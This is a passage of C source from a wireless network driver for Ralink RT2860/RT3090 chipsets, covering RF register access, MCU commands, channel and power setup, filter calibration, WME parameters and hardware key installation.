RAL_WRITE(sc, RT3070_RF_CSR_CFG, tmp); for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT3070_RF_CSR_CFG); if (!(tmp & RT3070_RF_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read RF register\n"); return 0xff; } return tmp & 0xff; } void rt3090_rf_write(struct rt2860_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 10; ntries++) { if (!(RAL_READ(sc, RT3070_RF_CSR_CFG) & RT3070_RF_KICK)) break; DELAY(10); } if (ntries == 10) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT3070_RF_WRITE | RT3070_RF_KICK | reg << 8 | val; RAL_WRITE(sc, RT3070_RF_CSR_CFG, tmp); } /* * Send a command to the 8051 microcontroller unit. */ int rt2860_mcu_cmd(struct rt2860_softc *sc, uint8_t cmd, uint16_t arg, int wait) { int slot, ntries; uint32_t tmp; uint8_t cid; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_H2M_MAILBOX) & RT2860_H2M_BUSY)) break; DELAY(2); } if (ntries == 100) return EIO; cid = wait ? cmd : RT2860_TOKEN_NO_INTR; RAL_WRITE(sc, RT2860_H2M_MAILBOX, RT2860_H2M_BUSY | cid << 16 | arg); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_HOST_CMD, cmd); if (!wait) return 0; /* wait for the command to complete */ for (ntries = 0; ntries < 200; ntries++) { tmp = RAL_READ(sc, RT2860_H2M_MAILBOX_CID); /* find the command slot */ for (slot = 0; slot < 4; slot++, tmp >>= 8) if ((tmp & 0xff) == cid) break; if (slot < 4) break; DELAY(100); } if (ntries == 200) { /* clear command and status */ RAL_WRITE(sc, RT2860_H2M_MAILBOX_STATUS, 0xffffffff); RAL_WRITE(sc, RT2860_H2M_MAILBOX_CID, 0xffffffff); return ETIMEDOUT; } /* get command status (1 means success) */ tmp = RAL_READ(sc, RT2860_H2M_MAILBOX_STATUS); tmp = (tmp >> (slot * 8)) & 0xff; DPRINTF(("MCU command=0x%02x slot=%d status=0x%02x\n", cmd, slot, tmp)); /* clear command and status */ RAL_WRITE(sc, RT2860_H2M_MAILBOX_STATUS, 0xffffffff); RAL_WRITE(sc, RT2860_H2M_MAILBOX_CID, 0xffffffff); return (tmp == 1) ? 0 : EIO; } static void rt2860_enable_mrr(struct rt2860_softc *sc) { #define CCK(mcs) (mcs) #define OFDM(mcs) (1 << 3 | (mcs)) RAL_WRITE(sc, RT2860_LG_FBK_CFG0, OFDM(6) << 28 | /* 54->48 */ OFDM(5) << 24 | /* 48->36 */ OFDM(4) << 20 | /* 36->24 */ OFDM(3) << 16 | /* 24->18 */ OFDM(2) << 12 | /* 18->12 */ OFDM(1) << 8 | /* 12-> 9 */ OFDM(0) << 4 | /* 9-> 6 */ OFDM(0)); /* 6-> 6 */ RAL_WRITE(sc, RT2860_LG_FBK_CFG1, CCK(2) << 12 | /* 11->5.5 */ CCK(1) << 8 | /* 5.5-> 2 */ CCK(0) << 4 | /* 2-> 1 */ CCK(0)); /* 1-> 1 */ #undef OFDM #undef CCK } static void rt2860_set_txpreamble(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2860_AUTO_RSP_CFG); tmp &= ~RT2860_CCK_SHORT_EN; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2860_CCK_SHORT_EN; RAL_WRITE(sc, RT2860_AUTO_RSP_CFG, tmp); } void rt2860_set_basicrates(struct rt2860_softc *sc, const struct ieee80211_rateset *rs) { #define RV(r) ((r) & IEEE80211_RATE_VAL) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t mask = 0; uint8_t rate; int i; for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i]; if (!(rate & IEEE80211_RATE_BASIC)) continue; mask |= 1 << ieee80211_legacy_rate_lookup(ic->ic_rt, RV(rate)); } RAL_WRITE(sc, RT2860_LEGACY_BASIC_RATE, mask); #undef RV } static void rt2860_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2860_BCN_TIME_CFG); RAL_WRITE(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); rt2860_set_gp_timer(sc, 0); } static void rt2860_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (vap->iv_state == IEEE80211_S_RUN) { rt2860_enable_tsf_sync(sc); rt2860_set_gp_timer(sc, 500); } } static void rt2860_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2860_switch_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } static void rt2860_select_chan_group(struct rt2860_softc *sc, int group) { uint32_t tmp; uint8_t agc; rt2860_mcu_bbp_write(sc, 62, 0x37 - sc->lna[group]); rt2860_mcu_bbp_write(sc, 63, 0x37 - sc->lna[group]); rt2860_mcu_bbp_write(sc, 64, 0x37 - sc->lna[group]); rt2860_mcu_bbp_write(sc, 86, 0x00); if (group == 0) { if (sc->ext_2ghz_lna) { rt2860_mcu_bbp_write(sc, 82, 0x62); rt2860_mcu_bbp_write(sc, 75, 0x46); } else { rt2860_mcu_bbp_write(sc, 82, 0x84); rt2860_mcu_bbp_write(sc, 75, 0x50); } } else { if (sc->ext_5ghz_lna) { rt2860_mcu_bbp_write(sc, 82, 0xf2); rt2860_mcu_bbp_write(sc, 75, 0x46); } else { rt2860_mcu_bbp_write(sc, 82, 0xf2); rt2860_mcu_bbp_write(sc, 75, 0x50); } } tmp = RAL_READ(sc, RT2860_TX_BAND_CFG); tmp &= ~(RT2860_5G_BAND_SEL_N | RT2860_5G_BAND_SEL_P); tmp |= (group == 0) ? RT2860_5G_BAND_SEL_N : RT2860_5G_BAND_SEL_P; RAL_WRITE(sc, RT2860_TX_BAND_CFG, tmp); /* enable appropriate Power Amplifiers and Low Noise Amplifiers */ tmp = RT2860_RFTR_EN | RT2860_TRSW_EN | RT2860_LNA_PE0_EN; if (sc->nrxchains > 1) tmp |= RT2860_LNA_PE1_EN; if (sc->mac_ver == 0x3593 && sc->nrxchains > 2) tmp |= RT3593_LNA_PE2_EN; if (group == 0) { /* 2GHz */ tmp |= RT2860_PA_PE_G0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_G1_EN; if (sc->mac_ver == 0x3593 && sc->ntxchains > 2) tmp |= RT3593_PA_PE_G2_EN; } else { /* 5GHz */ tmp |= RT2860_PA_PE_A0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_A1_EN; if (sc->mac_ver == 0x3593 && sc->ntxchains > 2) tmp |= RT3593_PA_PE_A2_EN; } RAL_WRITE(sc, RT2860_TX_PIN_CFG, tmp); if (sc->mac_ver == 0x3593) { tmp = RAL_READ(sc, RT2860_GPIO_CTRL); if (sc->sc_flags & RT2860_PCIE) { tmp &= ~0x01010000; if (group == 0) tmp |= 0x00010000; } else { tmp &= ~0x00008080; if (group == 0) tmp |= 0x00000080; } tmp = (tmp & ~0x00001000) | 0x00000010; RAL_WRITE(sc, RT2860_GPIO_CTRL, tmp); } /* set initial AGC value */ if (group == 0) { /* 2GHz band */ if (sc->mac_ver >= 0x3071) agc = 0x1c + sc->lna[0] * 2; else agc = 0x2e + sc->lna[0]; } else { /* 5GHz band */ agc = 0x32 + (sc->lna[group] * 5) / 3; } rt2860_mcu_bbp_write(sc, 66, agc); DELAY(1000); } static void rt2860_set_chan(struct rt2860_softc *sc, u_int chan) { const struct rfprog *rfprog = rt2860_rf2850; uint32_t r2, r3, r4; int8_t txpow1, txpow2; u_int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); r2 = rfprog[i].r2; if (sc->ntxchains == 1) r2 |= 1 << 12; /* 1T: disable Tx chain 2 */ if (sc->nrxchains == 1) r2 |= 1 << 15 | 1 << 4; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) r2 |= 1 << 4; /* 2R: disable Rx chain 3 */ /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; if (chan > 14) { if (txpow1 >= 0) txpow1 = txpow1 << 1 | 1; else txpow1 = (7 + txpow1) << 1; if (txpow2 >= 0) txpow2 = txpow2 << 1 | 1; else txpow2 = (7 + txpow2) << 1; } r3 = rfprog[i].r3 | txpow1 << 7; r4 = rfprog[i].r4 | sc->freq << 13 | txpow2 << 4; rt2860_rf_write(sc, RT2860_RF1, rfprog[i].r1); rt2860_rf_write(sc, RT2860_RF2, r2); rt2860_rf_write(sc, RT2860_RF3, r3); rt2860_rf_write(sc, RT2860_RF4, r4); DELAY(200); rt2860_rf_write(sc, RT2860_RF1, rfprog[i].r1); rt2860_rf_write(sc, RT2860_RF2, r2); rt2860_rf_write(sc, RT2860_RF3, r3 | 1); rt2860_rf_write(sc, RT2860_RF4, r4); DELAY(200); rt2860_rf_write(sc, RT2860_RF1, rfprog[i].r1); rt2860_rf_write(sc, RT2860_RF2, r2); rt2860_rf_write(sc, RT2860_RF3, r3); rt2860_rf_write(sc, RT2860_RF4, r4); } static void rt3090_set_chan(struct rt2860_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint8_t rf; int i; /* RT3090 is 2GHz only */ KASSERT(chan >= 1 && chan <= 14, ("chan %d not support", chan)); /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; rt3090_rf_write(sc, 2, rt3090_freqs[i].n); rf = rt3090_rf_read(sc, 3); rf = (rf & ~0x0f) | rt3090_freqs[i].k; rt3090_rf_write(sc, 3, rf); rf = rt3090_rf_read(sc, 6); rf = (rf & ~0x03) | rt3090_freqs[i].r; rt3090_rf_write(sc, 6, rf); /* set Tx0 power */ rf = rt3090_rf_read(sc, 12); rf = (rf & ~0x1f) | txpow1; rt3090_rf_write(sc, 12, rf); /* set Tx1 power */ rf = rt3090_rf_read(sc, 13); rf = (rf & ~0x1f) | txpow2; rt3090_rf_write(sc, 13, rf); rf = rt3090_rf_read(sc, 1); rf &= ~0xfc; if (sc->ntxchains == 1) rf |= RT3070_TX1_PD | RT3070_TX2_PD; else if (sc->ntxchains == 2) rf |= RT3070_TX2_PD; if (sc->nrxchains == 1) rf |= RT3070_RX1_PD | RT3070_RX2_PD; else if (sc->nrxchains == 2) rf |= RT3070_RX2_PD; rt3090_rf_write(sc, 1, rf); /* set RF offset */ rf = rt3090_rf_read(sc, 23); rf = (rf & ~0x7f) | sc->freq; rt3090_rf_write(sc, 23, rf); /* program RF filter */ rf = rt3090_rf_read(sc, 24); /* Tx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; rt3090_rf_write(sc, 24, rf); rf = rt3090_rf_read(sc, 31); /* Rx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; rt3090_rf_write(sc, 31, rf); /* enable RF tuning */ rf = rt3090_rf_read(sc, 7); rt3090_rf_write(sc, 7, rf | RT3070_TUNE); } static int rt3090_rf_init(struct rt2860_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) uint32_t tmp; uint8_t rf, bbp; int i; rf = rt3090_rf_read(sc, 30); /* toggle RF R30 bit 7 */ rt3090_rf_write(sc, 30, rf | 0x80); DELAY(1000); rt3090_rf_write(sc, 30, rf & ~0x80); tmp = RAL_READ(sc, RT3070_LDO_CFG0); tmp &= ~0x1f000000; if (sc->patch_dac && sc->mac_rev < 0x0211) tmp |= 0x0d000000; /* 1.35V */ else tmp |= 0x01000000; /* 1.2V */ RAL_WRITE(sc, RT3070_LDO_CFG0, tmp); /* patch LNA_PE_G1 */ tmp = RAL_READ(sc, RT3070_GPIO_SWITCH); RAL_WRITE(sc, RT3070_GPIO_SWITCH, tmp & ~0x20); /* initialize RF registers to default value */ for (i = 0; i < N(rt3090_def_rf); i++) { rt3090_rf_write(sc, rt3090_def_rf[i].reg, rt3090_def_rf[i].val); } /* select 20MHz bandwidth */ rt3090_rf_write(sc, 31, 0x14); rf = rt3090_rf_read(sc, 6); rt3090_rf_write(sc, 6, rf | 0x40); if (sc->mac_ver != 0x3593) { /* calibrate filter for 20MHz bandwidth */ sc->rf24_20mhz = 0x1f; /* default value */ rt3090_filter_calib(sc, 0x07, 0x16, &sc->rf24_20mhz); /* select 40MHz bandwidth */ bbp = rt2860_mcu_bbp_read(sc, 4); rt2860_mcu_bbp_write(sc, 4, (bbp & ~0x08) | 0x10); rf = rt3090_rf_read(sc, 31); rt3090_rf_write(sc, 31, rf | 0x20); /* calibrate filter for 40MHz bandwidth */ sc->rf24_40mhz = 0x2f; /* default value */ rt3090_filter_calib(sc, 0x27, 0x19, &sc->rf24_40mhz); /* go back to 20MHz bandwidth */ bbp = rt2860_mcu_bbp_read(sc, 4); rt2860_mcu_bbp_write(sc, 4, bbp & ~0x18); } if (sc->mac_rev < 0x0211) rt3090_rf_write(sc, 27, 0x03); tmp = RAL_READ(sc, RT3070_OPT_14); RAL_WRITE(sc, RT3070_OPT_14, tmp | 1); if (sc->rf_rev == RT3070_RF_3020) rt3090_set_rx_antenna(sc, 0); bbp = rt2860_mcu_bbp_read(sc, 138); if (sc->mac_ver == 0x3593) { if (sc->ntxchains == 1) bbp |= 0x60; /* turn off DAC1 and DAC2 */ else if (sc->ntxchains == 2) bbp |= 0x40; /* turn off DAC2 */ if (sc->nrxchains == 1) bbp &= ~0x06; /* turn off ADC1 and ADC2 */ else if (sc->nrxchains == 2) bbp &= ~0x04; /* turn off ADC2 */ } else { if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ } rt2860_mcu_bbp_write(sc, 138, bbp); rf = rt3090_rf_read(sc, 1); rf &= ~(RT3070_RX0_PD | RT3070_TX0_PD); rf |= RT3070_RF_BLOCK | RT3070_RX1_PD | RT3070_TX1_PD; rt3090_rf_write(sc, 1, rf); rf = rt3090_rf_read(sc, 15); rt3090_rf_write(sc, 15, rf & ~RT3070_TX_LO2); rf = rt3090_rf_read(sc, 17); rf &= ~RT3070_TX_LO1; if (sc->mac_rev >= 0x0211 && !sc->ext_2ghz_lna) rf |= 0x20; /* fix for long range Rx issue */ if (sc->txmixgain_2ghz >= 2) rf = (rf & ~0x7) | sc->txmixgain_2ghz; rt3090_rf_write(sc, 17, rf); rf = rt3090_rf_read(sc, 20); rt3090_rf_write(sc, 20, rf & ~RT3070_RX_LO1); rf = rt3090_rf_read(sc, 21); rt3090_rf_write(sc, 21, rf & ~RT3070_RX_LO2); return 0; #undef N } void rt3090_rf_wakeup(struct rt2860_softc *sc) { uint32_t tmp; uint8_t rf; if (sc->mac_ver == 0x3593) { /* enable VCO */ rf = rt3090_rf_read(sc, 1); rt3090_rf_write(sc, 1, rf | RT3593_VCO); /* initiate VCO calibration */ rf = rt3090_rf_read(sc, 3); rt3090_rf_write(sc, 3, rf | RT3593_VCOCAL); /* enable VCO bias current control */ rf = rt3090_rf_read(sc, 6); rt3090_rf_write(sc, 6, rf | RT3593_VCO_IC); /* initiate res calibration */ rf = rt3090_rf_read(sc, 2); rt3090_rf_write(sc, 2, rf | RT3593_RESCAL); /* set reference current control to 0.33 mA */ rf = rt3090_rf_read(sc, 22); rf &= ~RT3593_CP_IC_MASK; rf |= 1 << RT3593_CP_IC_SHIFT; rt3090_rf_write(sc, 22, rf); /* enable RX CTB */ rf = rt3090_rf_read(sc, 46); rt3090_rf_write(sc, 46, rf | RT3593_RX_CTB); rf = rt3090_rf_read(sc, 20); rf &= ~(RT3593_LDO_RF_VC_MASK | RT3593_LDO_PLL_VC_MASK); rt3090_rf_write(sc, 20, rf); } else { /* enable RF block */ rf = rt3090_rf_read(sc, 1); rt3090_rf_write(sc, 1, rf | RT3070_RF_BLOCK); /* enable VCO bias current control */ rf = rt3090_rf_read(sc, 7); rt3090_rf_write(sc, 7, rf | 0x30); rf = rt3090_rf_read(sc, 9); rt3090_rf_write(sc, 9, rf | 0x0e); /* enable RX CTB */ rf = rt3090_rf_read(sc, 21); rt3090_rf_write(sc, 21, rf | RT3070_RX_CTB); /* fix Tx to Rx IQ glitch by raising RF voltage */ rf = rt3090_rf_read(sc, 27); rf &= ~0x77; if (sc->mac_rev < 0x0211) rf |= 0x03; rt3090_rf_write(sc, 27, rf); } if (sc->patch_dac && sc->mac_rev < 0x0211) { tmp = RAL_READ(sc, RT3070_LDO_CFG0); tmp = (tmp & ~0x1f000000) | 0x0d000000; RAL_WRITE(sc, RT3070_LDO_CFG0, tmp); } } int rt3090_filter_calib(struct rt2860_softc *sc, uint8_t init, uint8_t target, uint8_t *val) { uint8_t rf22, rf24; uint8_t bbp55_pb, bbp55_sb, delta; int ntries; /* program filter */ rf24 = rt3090_rf_read(sc, 24); rf24 = (rf24 & 0xc0) | init; /* initial filter value */ rt3090_rf_write(sc, 24, rf24); /* enable baseband loopback mode */ rf22 = rt3090_rf_read(sc, 22); rt3090_rf_write(sc, 22, rf22 | RT3070_BB_LOOPBACK); /* set power and frequency of passband test tone */ rt2860_mcu_bbp_write(sc, 24, 0x00); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ rt2860_mcu_bbp_write(sc, 25, 0x90); DELAY(1000); /* read received power */ bbp55_pb = rt2860_mcu_bbp_read(sc, 55); if (bbp55_pb != 0) break; } if (ntries == 100) return ETIMEDOUT; /* set power and frequency of stopband test tone */ rt2860_mcu_bbp_write(sc, 24, 0x06); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ rt2860_mcu_bbp_write(sc, 25, 0x90); DELAY(1000); /* read received power */ bbp55_sb = rt2860_mcu_bbp_read(sc, 55); delta = bbp55_pb - bbp55_sb; if (delta > target) break; /* reprogram filter */ rf24++; rt3090_rf_write(sc, 24, rf24); } if (ntries < 100) { if (rf24 != init) rf24--; /* backtrack */ *val = rf24; rt3090_rf_write(sc, 24, rf24); } /* restore initial state */ rt2860_mcu_bbp_write(sc, 24, 0x00); /* disable baseband loopback mode */ rf22 = rt3090_rf_read(sc, 22); rt3090_rf_write(sc, 22, rf22 & ~RT3070_BB_LOOPBACK); return 0; } static void rt3090_rf_setup(struct rt2860_softc *sc) { uint8_t bbp; int i; if (sc->mac_rev >= 0x0211) { /* enable DC filter */ rt2860_mcu_bbp_write(sc, 103, 0xc0); /* improve power consumption */ bbp = rt2860_mcu_bbp_read(sc, 31); rt2860_mcu_bbp_write(sc, 31, bbp & ~0x03); } RAL_WRITE(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { RAL_WRITE(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 0x2c : 0x0f); } else RAL_WRITE(sc, RT2860_TX_SW_CFG2, 0); /* initialize RF registers from ROM */ for (i = 0; i < 10; i++) { if (sc->rf[i].reg == 0 || sc->rf[i].reg == 0xff) continue; rt3090_rf_write(sc, sc->rf[i].reg, sc->rf[i].val); } } static void rt2860_set_leds(struct rt2860_softc *sc, uint16_t which) { rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LEDS, which | (sc->leds & 0x7f), 0); } /* * Hardware has a general-purpose programmable timer interrupt that can * periodically raise MAC_INT_4. */ static void rt2860_set_gp_timer(struct rt2860_softc *sc, int ms) { uint32_t tmp; /* disable GP timer before reprogramming it */ tmp = RAL_READ(sc, RT2860_INT_TIMER_EN); RAL_WRITE(sc, RT2860_INT_TIMER_EN, tmp & ~RT2860_GP_TIMER_EN); if (ms == 0) return; tmp = RAL_READ(sc, RT2860_INT_TIMER_CFG); ms *= 16; /* Unit: 64us */ tmp = (tmp & 0xffff) | ms << RT2860_GP_TIMER_SHIFT; RAL_WRITE(sc, RT2860_INT_TIMER_CFG, tmp); /* enable GP timer */ tmp = RAL_READ(sc, RT2860_INT_TIMER_EN); RAL_WRITE(sc, RT2860_INT_TIMER_EN, tmp | RT2860_GP_TIMER_EN); } static void rt2860_set_bssid(struct rt2860_softc *sc, const uint8_t *bssid) { RAL_WRITE(sc, RT2860_MAC_BSSID_DW0, bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24); RAL_WRITE(sc, RT2860_MAC_BSSID_DW1, bssid[4] | bssid[5] << 8); } static void rt2860_set_macaddr(struct rt2860_softc *sc, const uint8_t *addr) { RAL_WRITE(sc, RT2860_MAC_ADDR_DW0, addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24); RAL_WRITE(sc, RT2860_MAC_ADDR_DW1, addr[4] | addr[5] << 8 | 0xff << 16); } static void rt2860_updateslot(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2860_BKOFF_SLOT_CFG); tmp &= ~0xff; tmp |= (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; RAL_WRITE(sc, RT2860_BKOFF_SLOT_CFG, tmp); } static void rt2860_updateprot(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RT2860_RTSTH_EN | RT2860_PROT_NAV_SHORT | RT2860_TXOP_ALLOW_ALL; /* setup protection frame rate (MCS code) */ tmp |= IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan) ? rt2860_rates[RT2860_RIDX_OFDM6].mcs : rt2860_rates[RT2860_RIDX_CCK11].mcs; /* CCK frames don't require protection */ RAL_WRITE(sc, RT2860_CCK_PROT_CFG, tmp); if (ic->ic_flags & IEEE80211_F_USEPROT) { if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) tmp |= RT2860_PROT_CTRL_RTS_CTS; else if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) tmp |= RT2860_PROT_CTRL_CTS; } RAL_WRITE(sc, RT2860_OFDM_PROT_CFG, tmp); } static void rt2860_update_promisc(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2860_RX_FILTR_CFG); tmp &= ~RT2860_DROP_NOT_MYBSS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2860_DROP_NOT_MYBSS; RAL_WRITE(sc, RT2860_RX_FILTR_CFG, tmp); } static int rt2860_updateedca(struct ieee80211com *ic) { struct rt2860_softc *sc = ic->ic_ifp->if_softc; const struct wmeParams *wmep; int aci; wmep = ic->ic_wme.wme_chanParams.cap_wmeParams; /* update MAC TX configuration registers */ for (aci = 0; aci < WME_NUM_AC; aci++) { RAL_WRITE(sc, RT2860_EDCA_AC_CFG(aci), wmep[aci].wmep_logcwmax << 16 | wmep[aci].wmep_logcwmin << 12 | wmep[aci].wmep_aifsn << 8 | wmep[aci].wmep_txopLimit); } /* update SCH/DMA registers too */ RAL_WRITE(sc, RT2860_WMM_AIFSN_CFG, wmep[WME_AC_VO].wmep_aifsn << 12 | wmep[WME_AC_VI].wmep_aifsn << 8 | wmep[WME_AC_BK].wmep_aifsn << 4 | wmep[WME_AC_BE].wmep_aifsn); RAL_WRITE(sc, RT2860_WMM_CWMIN_CFG, wmep[WME_AC_VO].wmep_logcwmin << 12 | wmep[WME_AC_VI].wmep_logcwmin << 8 | wmep[WME_AC_BK].wmep_logcwmin << 4 | wmep[WME_AC_BE].wmep_logcwmin); RAL_WRITE(sc, RT2860_WMM_CWMAX_CFG, wmep[WME_AC_VO].wmep_logcwmax << 12 | wmep[WME_AC_VI].wmep_logcwmax << 8 | wmep[WME_AC_BK].wmep_logcwmax << 4 | wmep[WME_AC_BE].wmep_logcwmax); RAL_WRITE(sc, RT2860_WMM_TXOP0_CFG, wmep[WME_AC_BK].wmep_txopLimit << 16 | wmep[WME_AC_BE].wmep_txopLimit); RAL_WRITE(sc, RT2860_WMM_TXOP1_CFG, wmep[WME_AC_VO].wmep_txopLimit << 16 | wmep[WME_AC_VI].wmep_txopLimit); return 0; } #ifdef HW_CRYPTO static int rt2860_set_key(struct ieee80211com *ic, struct ieee80211_node *ni, struct ieee80211_key *k) { struct rt2860_softc *sc = ic->ic_softc; bus_size_t base; uint32_t attr; uint8_t mode, wcid, iv[8]; /* defer setting of WEP keys until interface is brought up */ if ((ic->ic_if.if_flags & (IFF_UP | IFF_RUNNING)) != (IFF_UP | IFF_RUNNING)) return 0; /* map net80211 cipher to RT2860 security mode */ switch (k->k_cipher) { case IEEE80211_CIPHER_WEP40: mode = RT2860_MODE_WEP40; break; case IEEE80211_CIPHER_WEP104: mode = RT2860_MODE_WEP104; break; case IEEE80211_CIPHER_TKIP: mode = RT2860_MODE_TKIP; break; case IEEE80211_CIPHER_CCMP: mode = RT2860_MODE_AES_CCMP; break; default: return EINVAL; } if (k->k_flags & IEEE80211_KEY_GROUP) { wcid = 0; /* NB: update WCID0 for group keys */ base = RT2860_SKEY(0, k->k_id); } else { wcid = ((struct rt2860_node *)ni)->wcid; base = RT2860_PKEY(wcid); } if (k->k_cipher == IEEE80211_CIPHER_TKIP) { RAL_WRITE_REGION_1(sc, base, k->k_key, 16); #ifndef IEEE80211_STA_ONLY if (ic->ic_opmode == IEEE80211_M_HOSTAP) { RAL_WRITE_REGION_1(sc, base + 16, &k->k_key[16], 8); RAL_WRITE_REGION_1(sc, base + 24, &k->k_key[24], 8); } else #endif { RAL_WRITE_REGION_1(sc, base + 16, &k->k_key[24], 8); RAL_WRITE_REGION_1(sc, base + 24, &k->k_key[16], 8); } } else RAL_WRITE_REGION_1(sc, base, k->k_key, k->k_len); if (!(k->k_flags & IEEE80211_KEY_GROUP) || (k->k_flags & IEEE80211_KEY_TX)) { /* set initial packet number in IV+EIV */ if (k->k_cipher == IEEE80211_CIPHER_WEP40 || k->k_cipher == IEEE80211_CIPHER_WEP104) { uint32_t val = arc4random(); /* skip weak IVs from Fluhrer/Mantin/Shamir */ if (val >= 0x03ff00 && (val & 0xf8ff00) == 0x00ff00) val += 0x000100; iv[0] = val; iv[1] = val >> 8; iv[2] = val >> 16; iv[3] = k->k_id << 6; iv[4] = iv[5] = iv[6] = iv[7] = 0; } else { if (k->k_cipher == IEEE80211_CIPHER_TKIP) { iv[0] = k->k_tsc >> 8; iv[1] = (iv[0] | 0x20) & 0x7f; iv[2] = k->k_tsc; } else /* CCMP */ { iv[0] = k->k_tsc; iv[1] = k->k_tsc >> 8; iv[2] = 0; } iv[3] = k->k_id << 6 | IEEE80211_WEP_EXTIV; iv[4] = k->k_tsc >> 16; iv[5] = k->k_tsc >> 24; iv[6] = k->k_tsc >> 32; iv[7] = k->k_tsc >> 40; } RAL_WRITE_REGION_1(sc, RT2860_IVEIV(wcid), iv, 8); } if (k->k_flags & IEEE80211_KEY_GROUP) { /* install group key */ attr = RAL_READ(sc, RT2860_SKEY_MODE_0_7); attr &= ~(0xf << (k->k_id * 4)); attr |= mode << (k->k_id * 4); RAL_WRITE(sc, RT2860_SKEY_MODE_0_7, attr); } else { /* install pairwise key */ attr = RAL_READ(sc, RT2860_WCID_ATTR(wcid)); attr = (attr & ~0xf) | (mode << 1) | RT2860_RX_PKEY_EN; RAL_WRITE(sc, RT2860_WCID_ATTR(wcid), attr); } return 0; } static void rt2860_delete_key(struct ieee80211com *ic, struct ieee80211_node *ni, struct ieee80211_key *k) { struct rt2860_softc *sc = ic->ic_softc; uint32_t attr; uint8_t wcid; if (k->k_flags & IEEE80211_KEY_GROUP) { /* remove group key */ attr = RAL_READ(sc, RT2860_SKEY_MODE_0_7); attr &= ~(0xf << (k->k_id * 4)); RAL_WRITE(sc, RT2860_SKEY_MODE_0_7, attr); } else { /* remove pairwise key */ wcid = ((struct rt2860_node *)ni)->wcid; attr = RAL_READ(sc, RT2860_WCID_ATTR(wcid)); attr &= ~0xf; RAL_WRITE(sc, RT2860_WCID_ATTR(wcid), attr); } } #endif static int8_t rt2860_rssi2dbm(struct rt2860_softc *sc, uint8_t rssi, uint8_t rxchain) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_channel *c = ic->ic_curchan; int delta; if (IEEE80211_IS_CHAN_5GHZ(c)) { u_int chan = ieee80211_chan2ieee(ic, c); delta = sc->rssi_5ghz[rxchain]; /* determine channel group */ if (chan <= 64) delta -= sc->lna[1]; else if (chan <= 128) delta -= sc->lna[2]; else delta -= sc->lna[3]; } else delta = sc->rssi_2ghz[rxchain] - sc->lna[0]; return -12 - delta - rssi; } /* * Add `delta' (signed) to each 4-bit sub-word of a 32-bit word. * Used to adjust per-rate Tx power registers. */ static __inline uint32_t b4inc(uint32_t b32, int8_t delta) { int8_t i, b4; for (i = 0; i < 8; i++) { b4 = b32 & 0xf; b4 += delta; if (b4 < 0) b4 = 0; else if (b4 > 0xf) b4 = 0xf; b32 = b32 >> 4 | b4 << 28; } return b32; } static const char * rt2860_get_rf(uint8_t rev) { switch (rev) { case RT2860_RF_2820: return "RT2820"; case RT2860_RF_2850: return "RT2850"; case RT2860_RF_2720: return "RT2720"; case RT2860_RF_2750: return "RT2750"; case RT3070_RF_3020: return "RT3020"; case RT3070_RF_2020: return "RT2020"; case RT3070_RF_3021: return "RT3021"; case RT3070_RF_3022: return "RT3022"; case RT3070_RF_3052: return "RT3052"; case 